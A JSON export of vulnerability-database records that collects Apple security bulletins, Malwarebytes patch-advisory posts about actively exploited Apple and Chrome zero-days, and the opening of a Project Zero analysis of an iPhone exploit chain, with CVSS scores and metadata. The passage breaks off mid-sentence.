{"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205", "CVE-2023-28206"], "modified": "2023-04-10T00:00:00", "id": "APPLE:4D00E7FBD6D305B98412E984CF5CBEB0", "href": "https://support.apple.com/kb/HT213723", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-09T15:00:27", "description": "# About the security content of macOS Big Sur 11.7.6\n\nThis document describes the security content of macOS Big Sur 11.7.6.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## macOS Big Sur 11.7.6\n\nReleased April 10, 2023\n\n**IOSurfaceAccelerator**\n\nAvailable for: macOS Big Sur\n\nImpact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2023-28206: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: November 09, 2023\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-04-10T00:00:00", "type": "apple", "title": "About the security content of macOS Big Sur 11.7.6", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-04-10T00:00:00", "id": "APPLE:D5B90B4C3FFEF1EFC2D895F960EB301D", "href": "https://support.apple.com/kb/HT213725", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T22:08:14", "description": "# About the security content of macOS Monterey 12.6.5\n\nThis document describes the security content of macOS Monterey 12.6.5.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## macOS Monterey 12.6.5\n\nReleased April 10, 2023\n\n**IOSurfaceAccelerator**\n\nAvailable for: macOS Monterey\n\nImpact: An app may be able to execute arbitrary code with kernel privileges. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: An out-of-bounds write issue was addressed with improved input validation.\n\nCVE-2023-28206: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 31, 2023\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.6, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 6.0}, "published": "2023-04-10T00:00:00", "type": "apple", "title": "About the security content of macOS Monterey 12.6.5", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.4, "vectorString": "AV:L/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28206"], "modified": "2023-04-10T00:00:00", "id": "APPLE:17ECDD9D843E3FB37FB8F9A31FE36A99", "href": "https://support.apple.com/kb/HT213724", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-08T22:08:18", "description": "# About the security content of Safari 16.4.1\n\nThis document describes the security content of Safari 16.4.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page.\n\n## Safari 16.4.1\n\nReleased April 7, 2023\n\n**WebKit**\n\nAvailable for: macOS Big Sur and macOS Monterey\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.\n\nDescription: A use after free issue was addressed with improved memory management.\n\nWebKit Bugzilla: 254797\n\nCVE-2023-28205: Cl\u00e9ment Lecigne of Google's Threat Analysis Group and Donncha \u00d3 Cearbhaill of Amnesty International\u2019s Security Lab\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: October 31, 2023\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-07T00:00:00", "type": "apple", "title": "About the security content of Safari 16.4.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-28205"], "modified": "2023-04-07T00:00:00", "id": "APPLE:522AA8B4B44916121871E87266D0A714", "href": "https://support.apple.com/kb/HT213722", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2023-04-12T00:17:10", "description": "On Friday April 7, 2023, Apple released iOS 16.4.1, iPadOS 16.4.1, and macOS 13.3.1 for the iPhone, iPad, and Mac, respectively, and our advice is to install them as soon as possible because all three updates include important security fixes.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has already ordered federal agencies to patch these two security vulnerabilities before May 1st, 2023.\n\nThe updates may already have reached you in your regular update routines, but it doesn't hurt to check if your device is at the [latest update level](<https://support.apple.com/en-us/HT201222>). If a Safari update is available for your device, you can get it by updating or upgrading macOS, iOS, or iPadOS.\n\n[How to update your iPhone or iPad.](<https://support.apple.com/en-us/HT204204>)\n\n[How to update macOS on Mac.](<https://support.apple.com/en-us/HT201541>)\n\n## The vulnerabilities\n\nThe [security content of iOS 16.4.1 and iPadOS 16.4.1](<https://support.apple.com/en-us/HT213720>) contains information about two vulnerabilities that Apple has been made aware of reports that these issue may have been actively exploited.\n\n[CVE-2023-28206](<https://vulners.com/cve/CVE-2023-28206>): an out-of-bounds write issue in IOSurfaceAccelerator was addressed with improved input validation. The issue that could allow an app to execute arbitrary code with kernel privileges is fixed in iOS 15.7.5 and iPadOS 15.7.5, macOS Monterey 12.6.5, iOS 16.4.1 and iPadOS 16.4.1, macOS Big Sur 11.7.6, macOS Ventura 13.3.1.\n\nIOSurfaceAccelerator is an object that manages hardware accelerated transfers/scales between IOSurfaces in the IOSurface framework. The IOSurface framework provides a framebuffer object suitable for sharing across process boundaries. It is commonly used to allow applications to move complex image decompression and draw logic into a separate process to enhance security.\n\nAn out-of-bounds write can occur when a program writes outside the bounds of an allocated area of memory, potentially leading to a crash or arbitrary code execution. This can happen when the size of the data written is larger than the size of the allocated memory area, when the data is written to an incorrect location within the memory area, or when the program incorrectly calculates the size or location of the data to be written. In this case an attacker can use it to elevate the privileges of a malicious app. For those interested, a proof-of-concept (PoC) has been [published](<https://gist.github.com/LinusHenze/728db96a836b6817ecb727cfbde606b3>) for this vulnerability.\n\n[CVE-2023-28205](<https://vulners.com/cve/CVE-2023-28205>): a use after free (UAF) issue was addressed with improved memory management. This issue is fixed in iOS 15.7.5 and iPadOS 15.7.5, Safari 16.4.1, iOS 16.4.1 and iPadOS 16.4.1, macOS Ventura 13.3.1.\n\nUAF is a type of vulnerability that is the result of the incorrect use of dynamic memory during a program&#x27;s operation. If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code. In this case, when the vulnerability is exploited, processing maliciously crafted web content may lead to arbitrary code execution.\n\nWebKit is Apple&#x27;s web rendering engine. In other words, WebKit is the browser engine that powers Safari and other apps.\n\nThe [security content of macOS Ventura 13.3.1](<https://support.apple.com/en-us/HT213721>) covers the same two vulnerabilities and Apple has also released a new Safari 16.4.1 update for macOS Monterey and macOS Big Sur, which likely addresses the WebKit vulnerability.\n\n* * *\n\nMalwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.\n\n[TRY NOW](<https://www.malwarebytes.com/business/contact-us/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-11T03:00:00", "type": "malwarebytes", "title": "Apple releases emergency updates for two known-to-be-exploited vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2023-28205", "CVE-2023-28206"], "modified": "2023-04-11T03:00:00", "id": "MALWAREBYTES:B487BF5B3E6EA5BB5C7CABAF0083C8A5", "href": "https://www.malwarebytes.com/blog/news/2023/04/apple-releases-emergency-updates-for-two-known-to-be-exploited-vulnerabilities", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-04-24T16:18:09", "description": "In a recent [security advisory](<https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html>), Google says it patched a high-severity zero-day security flaw in its Chrome browser--[the first in 2023](<https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-first-zero-day-of-2023/>)--currently being exploited in the wild by threat actors. The company urges all its Windows, Mac, and Linux users to update to version **112.0.5615.121** immediately, as this flaw is present in Chrome versions before this one. Updating your browser can be done manually or automatically.\n\nIf you use other Chromium-based browsers, you may need to update them as well.\n\nThe vulnerability, tracked as [**CVE-2023-2033**](<https://nvd.nist.gov/vuln/detail/CVE-2023-2033>), is exploitable when a user visits a malicious webpage using an unpatched Chrome browser. The page could run arbitrary code in the browser, potentially leading to your computing device being hijacked. Google knows an exploit code for this flaw already exists and is circulating in the wild.\n\nCVE-2023-2033 is a [type-confusion](<https://cwe.mitre.org/data/definitions/843.html>) bug in [V8](<https://v8.dev/>), Google's open-source JavaScript and WebAssembly engine. As with zero-day patch announcements, the company supplied little to no details on how attackers could exploit this flaw. However, we know that attacks on V8, although uncommon, are considered one of the most dangerous. Exploiting a weakness in V8 typically leads to a browser crashing.\n\n\"Access to bug details and links may be kept restricted until a majority of users are updated with a fix,\" says Google in the advisory. \"We will also retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven't yet fixed.\"\n\nGoogle is giving all its Chrome users enough time to update to the latest version until technical details are released.\n\n## How to manually update Chrome\n\nGoogle Chrome typically updates automatically. However, it's worth double checking. To check if your browser is up to date:\n\n * Click the three vertical dots at the upper right-hand side of the URL bar.\n * Select Help &gt; About Google Chrome.\n\nSimply doing this should trigger Chrome to update. Once done, the browser will ask you to relaunch. Click the button to confirm and complete the update process.\n\nGoogle would never let users manually download and install a separate file to update Chrome. Scammers and threat actors have used this tactic many times in the past, and, for a time, it worked. Now and then, this tactic is [adopted in a malicious campaign](<https://www.malwarebytes.com/blog/news/2023/04/fake-chrome-updates-spread-malware>), to catch those who aren't familiar with how Chrome works or how Google updates its products.\n\nStay safe!\n\n* * *\n\nMalwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.\n\n[TRY NOW](<https://www.malwarebytes.com/business/contact-us/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-04-17T04:00:00", "type": "malwarebytes", "title": "Update Chrome now! Google patches actively exploited flaw", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2023-2033"], "modified": "2023-04-17T04:00:00", "id": "MALWAREBYTES:4626DAC5E564F84D8120875767C1EE7C", "href": "https://www.malwarebytes.com/blog/news/2023/04/update-chrome-now-google-patches-actively-exploited-flaw", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-02T20:29:42", "description": "Google has [announced](<https://chromereleases.googleblog.com/2022/10/stable-channel-update-for-desktop_27.html>) an update for Chrome that fixes an in-the-wild exploit. Chrome Stable channel has been updated to 107.0.5304.87 for Mac and Linux, and 107.0.5304.87/.88 for Windows.\n\nThe vulnerability at hand is described as a type confusion issue in the V8 Javascript engine.\n\n## Mitigation\n\nIf you&#x27;re a Chrome user on Windows, Mac, or Linux, you should update as soon as possible. Most of the time, the easiest way to update Chrome is to do nothing--it should update itself automatically, using the same method as outlined below but without your involvement. However, if something goes wrong--such as an extension blocking the update--or if you never close your browser, you can end up lagging behind on your updates.\n\nSo, it doesn&#x27;t hurt to check now and again. And now would be a good time, given the severity of the vulnerabilities in this batch.\n\nMy preferred method is to have Chrome open the page [chrome://settings/help](<>), which you can also find by clicking **Settings &gt; About Chrome**.\n\nUpdating Chrome\n\nIf there is an update available, Chrome will notify you and start downloading it. Then all you have to do is relaunch the browser in order for the update to complete.\n\nChrome is up to date\n\nAfter the update the version should be 107.0.5304.87 or later.\n\n## CVE-2022-3723\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\nThis is the one that urged the out of bounds update was [CVE-2022-3723](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3723>), a type confusion issue with Chrome's V8 JavaScript engine. A remote attacker could exploit this vulnerability to trigger data manipulation on the targeted system.\n\nType confusion is possible when a piece of code doesn&#x27;t verify the type of object that is passed to it. The program allocates or initializes an object using one type, but it later accesses it using a type that is incompatible with the original. Details about the vulnerability will not be released before everyone has had a chance to update, but it seems that in this case the manipulation with an unknown input can lead to privilege escalation.\n\nThe V8 engine is a very important component within Chrome that's used to process JavaScript commands. A [very similar vulnerability](<https://www.malwarebytes.com/blog/news/2022/03/update-now-google-releases-emergency-patch-for-chrome-zero-day-used-in-the-wild>) was found in March of 2022. This was also a type confusion issue in the V8 engine, which turned out to affect other Chromium based browsers as well. So keep an eye out for updates on any other Chromium based browser you may be using, such as Edge.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-28T21:45:00", "type": "malwarebytes", "title": "A Chrome fix for an in-the-wild exploit is out\u2014Check your version", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2022-10-28T21:45:00", "id": "MALWAREBYTES:CBCD880E5209A5267DCBEB5FB041C435", "href": "https://www.malwarebytes.com/blog/news/2022/10/update-chrome-now-and-fix-a-vulnerability-with-an-existing-exploit-for-it", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-06T00:03:08", "description": "On Friday, Google [announced](<https://chromereleases.googleblog.com/2022/09/stable-channel-update-for-desktop.html>) the release of a new version of its Chrome browser that includes a security fix for a zero-day tracked as [CVE-2022-3075](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3075>). As with previous announcements, technical details about the vulnerability won't be released until a certain number of Chrome users have already applied the patch.\n\nGoogle is urging its Windows, Mac, and Linux users to update Chrome to version** 105.0.5195.102**.\n\nCVE-2022-3075 is described as an \"[i]nsufficient data validation in Mojo\". According to Chromium documents, Mojo is \"a collection of runtime libraries&quot; that facilitates interfacing standard, low-level interprocess communication (IPC) primitives. Mojo provides a platform-agnostic abstraction of these primitives, which comprise most of Chrome's code.\n\nAn anonymous security researcher is credited for discovering and reporting the flaw.\n\nCVE-2022-3075 is the sixth zero-day Chrome vulnerability Google had to address. The previous ones were:\n\n * [C](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>)[VE-2022-0609](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>), a Use-after-Free (UAF) vulnerability, which was patched in February\n * [CVE-2022-1096](<https://www.malwarebytes.com/blog/news/2022/03/update-now-google-releases-emergency-patch-for-chrome-zero-day-used-in-the-wild>), a \"Type Confusion in V8\" vulnerability, which was patched in March\n * [CVE-2022-1364](<https://www.bleepingcomputer.com/news/security/google-chrome-emergency-update-fixes-zero-day-used-in-attacks/>), a flaw in the V8 JavaScript engine, which was patched in April\n * [CVE-2022-2294](<https://www.malwarebytes.com/blog/news/2022/07/update-now-chrome-patches-another-zero-day-vulnerability>), a flaw in the Web Real-Time Communications (WebRTC), which was patched in July\n * [CVE-2022-2856](<https://www.malwarebytes.com/blog/news/2022/08/update-chrome-now-google-issues-patch-for-zero-day-spotted-in-the-wild>), an insufficient input validation flaw, which was patched in August\n\nGoogle Chrome needs minimum oversight as it updates automatically. However, if you're in the habit of not closing your browser or have extensions that may hinder Chrome from automatically doing this, please check your browser every now and then.\n\nOnce Chrome notifies you of an available update, don't hesitate to download it. The patch is applied once you relaunch the browser.\n\n\n\nStay safe!", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-09-05T16:30:00", "type": "malwarebytes", "title": "Zero-day puts a dent in Chrome's mojo", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294", "CVE-2022-2856", "CVE-2022-3075"], "modified": "2022-09-05T16:30:00", "id": "MALWAREBYTES:08FDD3DEF41B63F1DEB23C21DCFDB12D", "href": "https://www.malwarebytes.com/blog/news/2022/09/update-chrome-asap-a-new-zero-day-is-already-being-exploited", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-08T16:24:17", "description": "On Friday, December 2, [Google rolled out an out-of-band patch](<https://chromereleases.googleblog.com/2022/12/stable-channel-update-for-desktop.html>) for an actively exploited zero-day vulnerability in its [V8 JavaScript engine](<https://v8.dev/>). The flaw could allow attackers to cause a system crash or execute potentially malicious code.\n\nThat means you'll want to update Chrome to patch against this vulnerability as soon as you can. Do this by navigating to the \"About Chrome\" page on your browser&#x27;s menu.\n\nIf your Chrome version is 108.0.5359.94 (Mac and Linux) or 108.0.5359.94/.95 (Windows), then you have the latest version. If it, click Update Google Chrome.\n\nNote: if you don&#x27;t have the update option, such as in the case below, some files may be missing from your computer, so it&#x27;s best to uninstall and reinstall Chrome.\n\nChrome without an update button option\n\nAlso, if you have other Chromium-based browsers you&#x27;re using, you may need to update them.\n\n## Vulnerability details\n\nThe flaw, tracked as [CVE-2022-4262](<https://nvd.nist.gov/vuln/detail/CVE-2022-4262>), has a severity rating of &quot;High&quot; and is a type confusion bug. Once exploited, remote attackers could exploit a [memory corruption](<https://en.wikipedia.org/wiki/Memory_corruption>) (also called heap corruption) using a specially crafted HTML page.\n\nA type confusion bug happens when code doesn&#x27;t verify the object type passed to it, and then uses the object without type-checking. Unfortunately, this bug occurs on the V8 JavaScript engine, Google&#x27;s open-source JavaScript engine. Attacks on the V8 are not common; however, it's considered one of the most dangerous.\n\nCVE-2022-4262 is the 4th type confusion bug found this year and the 9th actively exploited zero-day to date.\n\nAs with any zero-day vulnerabilities Google patches, very little technical detail is provided about the vulnerability. You will also find that online pages for this vulnerability either contain incomplete details or are there as placeholders to be updated with new information in the future. The National Vulnerability Database is currently analyzing this flaw.\n\n* * *\n\n**We don't just report on threats--we remove them**\n\nCybersecurity risks should never spread beyond a headline. Keep threats off your devices by [downloading Malwarebytes today](<https://www.malwarebytes.com/for-home>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-05T22:30:00", "type": "malwarebytes", "title": "Update now! Emergency fix for Google Chrome's V8 JavaScript engine zero-day flaw released", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-4262"], "modified": "2022-12-05T22:30:00", "id": "MALWAREBYTES:4FCBD5A9882474969BB67DE6ECA7A4C7", "href": "https://www.malwarebytes.com/blog/news/2022/12/update-now-emergency-fix-for-google-chromes-v8-javascript-engine-zero-day-flaw-released", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-03-30T15:40:03", "description": "Google has [urged](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>) its 3 billion+ users to update to Chrome version 99.0.4844.84 for Mac, Windows, and Linux to mitigate a zero-day that is currently being exploited in the wild. This is in response to a bug reported by an anonymous security researcher last week.\n\nThe flaw, which is tracked as [CVE-2022-1096](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1096>), is a &quot;Type Confusion in V8&quot; and is rated as high severity, meaning that it&#x27;s necessary for everyone using Chrome to update as quickly as possible because of the damage attackers could cause once they exploit this.\n\nNot much is known about the vulnerability itself or how great the impact would be if exploited, but the unusual release of this patch, which notably addresses just one vulnerability, means that this update shouldn&#x27;t be ignored.\n\nGoogle is always cautious to release more details until the majority of users are updated with a fix. Google says it [may take weeks](<https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html>) before the update reaches its entire user base.\n\n## How to update\n\nThe easiest way to update is to allow Chrome to do it automatically, which basically uses the same method I outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.\n\nSo, it doesn\u2019t hurt to check now and then. And now would be a good time.\n\nMy preferred method is to have Chrome open the page **chrome://settings/help** which you can also find by clicking **Settings &gt; About Chrome**.\n\nIf there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is relaunch the browser.\n\n## Microsoft Edge\n\nMicrosoft has [confirmed](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-1096>) that Edge, a Chromium-based browser, is also affected by this vulnerability. Edge users should urgently update their browsers to version 99.0.1150.55, which is not vulnerable to the flaw.\n\nThe post [Update now! Google releases emergency patch for Chrome zero-day used in the wild](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/update-now-google-releases-emergency-patch-for-chrome-zero-day-used-in-the-wild/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-03-28T13:42:54", "type": "malwarebytes", "title": "Update now! Google releases emergency patch for Chrome zero-day used in the wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-1096"], "modified": "2022-03-28T13:42:54", "id": "MALWAREBYTES:3203C761121FB47FC676CC2505B4A9FD", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/update-now-google-releases-emergency-patch-for-chrome-zero-day-used-in-the-wild/", "cvss": {"score": 0.0, "vector": "NONE"}}], "googleprojectzero": [{"lastseen": "2023-11-09T02:05:57", "description": "### By Ian Beer\n\n[](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrzpTZ2_H16_OJgFkwuJNmL120zmxWCcdrLlPXp-6x5SsweX8PosbAcKI9Sf8Ad0bYlMfDGwJ0Rz5GdwwEVnek-taAR1voRObiCwl7StIIx2gIHw7zH16AOi-TJRNiyDYKXprNRQNmt6vosLtafQdbjrRgTJB7HLUt_qc1sfCG_sAWZk_wfsfaei3c2-4/s1600/image7.png>)\n\nA graph representation of the sandbox escape NSExpression payload\n\nIn April this year Google's Threat Analysis Group, in collaboration with Amnesty International, discovered an in-the-wild iPhone zero-day exploit chain being used in targeted attacks delivered via malicious link. The chain was reported to Apple under a 7-day disclosure deadline and Apple released [iOS 16.4.1 on April 7, 2023](<https://support.apple.com/en-us/HT213720>) fixing CVE-2023-28206 and CVE-2023-28205.\n\nOver the last few years Apple has been hardening the Safari WebContent (or \"renderer\") process sandbox attack surface on iOS, recently removing the ability for the WebContent process to access GPU-related hardware directly. Access to graphics-related drivers is now brokered via a GPU process which runs in a separate sandbox.\n\nAnalysis of this in-the-wild exploit chain reveals the first known case of attackers exploiting the Safari IPC layer to \"hop\" from WebContent to the GPU process, adding an extra link to the exploit chain ([CVE-2023-32409](<https://support.apple.com/en-us/HT213757>)).\n\nOn the surface this is a positive sign: clear evidence that the renderer sandbox was hardened sufficiently that (in this isolated case at least) the attackers needed to bundle an additional, separate exploit. Project Zero has long advocated for attack-surface reduction as an effective tool for improving security and this would seem like a clear win for that approach.\n\nOn the other hand, upon deeper inspection, things aren't quite so rosy. Retroactively sandboxing code which was never designed with compartmentalization in mind is rarely simple to do effectively. In this case the exploit targeted a very basic buffer overflow vulnerability in unused IPC support code for a disabled feature - effectively new attack surface which exists only because of the introduced sandbox. A simple fuzzer targeting the IPC layer would likely have found this vulnerability in seconds.\n\nNevertheless, it remains the case that attackers will still need to exploit this extra link in the chain each time to reach the GPU driver kernel attack surface. A large part of this writeup is dedicated to analysis of the NSExpression-based framework the attackers developed to ease this and vastly reduce their marginal 